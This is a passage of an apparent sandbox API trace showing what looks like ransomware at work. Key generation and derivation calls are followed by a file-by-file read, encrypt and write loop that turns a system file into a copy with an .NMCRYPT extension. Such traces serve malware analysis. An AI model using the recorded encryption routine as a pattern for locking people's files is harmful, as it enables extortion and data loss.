out: pbBuffer=0x2d7e630) returned 1 [0144.926] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.926] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.926] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.926] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.926] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.926] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.926] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.926] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.926] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.926] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.926] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.926] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.926] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.926] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.926] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.926] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.926] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.926] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.926] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.926] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.926] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.926] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.926] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.926] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.926] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.926] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.926] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.926] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.926] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.927] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.927] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.927] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.927] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.927] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.927] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.927] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0144.927] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0144.927] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0144.928] CryptCreateHash (in: hProv=0x8e35d8, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4447f4 | out: phHash=0x1d4447f4) returned 1 [0144.928] CryptHashData (hHash=0x9ad2f8, pbData=0x2d7e6d0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0144.928] CryptDeriveKey (in: hProv=0x8e35d8, Algid=0x6610, hBaseData=0x9ad2f8, dwFlags=0x4, phKey=0x1d4447f8 | out: phKey=0x1d4447f8*=0x9ad7b8) returned 1 [0144.928] CryptSetKeyParam (hKey=0x9ad7b8, dwParam=0x1, pbData=0x2d7e7d0, dwFlags=0x0) returned 1 [0144.928] CryptSetKeyParam (hKey=0x9ad7b8, dwParam=0x4, pbData=0x2d7e680*=0x1, dwFlags=0x0) returned 1 [0144.928] wcslen (_String="\\\\?\\") returned 0x4 [0144.928] CryptDuplicateKey (in: hKey=0x9ad7b8, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e654 | out: phKey=0x2d7e654*=0x9ad178) returned 1 [0144.928] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrusalm.dat.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrusalm.dat.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0144.929] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrusalm.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrusalm.dat"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1624 [0144.932] GetFileSizeEx (in: hFile=0x1624, lpFileSize=0x2d7e644 | out: lpFileSize=0x2d7e644*=2508448) returned 1 [0144.932] WriteFile (in: hFile=0x588, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e63c*=0x200, lpOverlapped=0x0) returned 1 [0144.932] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.936] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.936] GetLastError () returned 0x0 [0144.936] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.938] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.939] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.939] GetLastError () returned 0x0 [0144.939] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.939] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.939] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.939] GetLastError () returned 0x0 [0144.939] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.939] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.939] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.939] GetLastError () returned 0x0 [0144.939] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.939] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.939] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.939] GetLastError () returned 0x0 [0144.939] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.939] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.939] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.940] GetLastError () returned 0x0 [0144.940] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.940] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.940] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.940] GetLastError () returned 0x0 [0144.940] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.940] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.940] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.940] GetLastError () returned 0x0 [0144.940] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.940] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.940] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.940] GetLastError () returned 0x0 [0144.940] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.940] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.940] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.940] GetLastError () returned 0x0 [0144.940] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.940] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.941] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.941] GetLastError () returned 0x0 [0144.941] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.941] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.941] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.941] GetLastError () returned 0x0 [0144.941] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.941] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.941] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.941] GetLastError () returned 0x0 [0144.941] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.941] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.941] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.941] GetLastError () returned 0x0 [0144.941] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.941] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.941] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.941] GetLastError () returned 0x0 [0144.941] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.942] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.942] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.942] GetLastError () returned 0x0 [0144.942] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.942] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.942] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.942] GetLastError () returned 0x0 [0144.942] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.942] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.942] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.942] GetLastError () returned 0x0 [0144.942] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.942] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.942] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.942] GetLastError () returned 0x0 [0144.942] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.942] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.942] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.942] GetLastError () returned 0x0 [0144.942] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.943] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.943] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.943] GetLastError () returned 0x0 [0144.943] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.943] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.943] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.943] GetLastError () returned 0x0 [0144.943] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.943] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0144.943] CryptEncrypt (in: hKey=0x9ad178, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0144.943] GetLastError () returned 0x0 [0144.943] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0144.943] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, 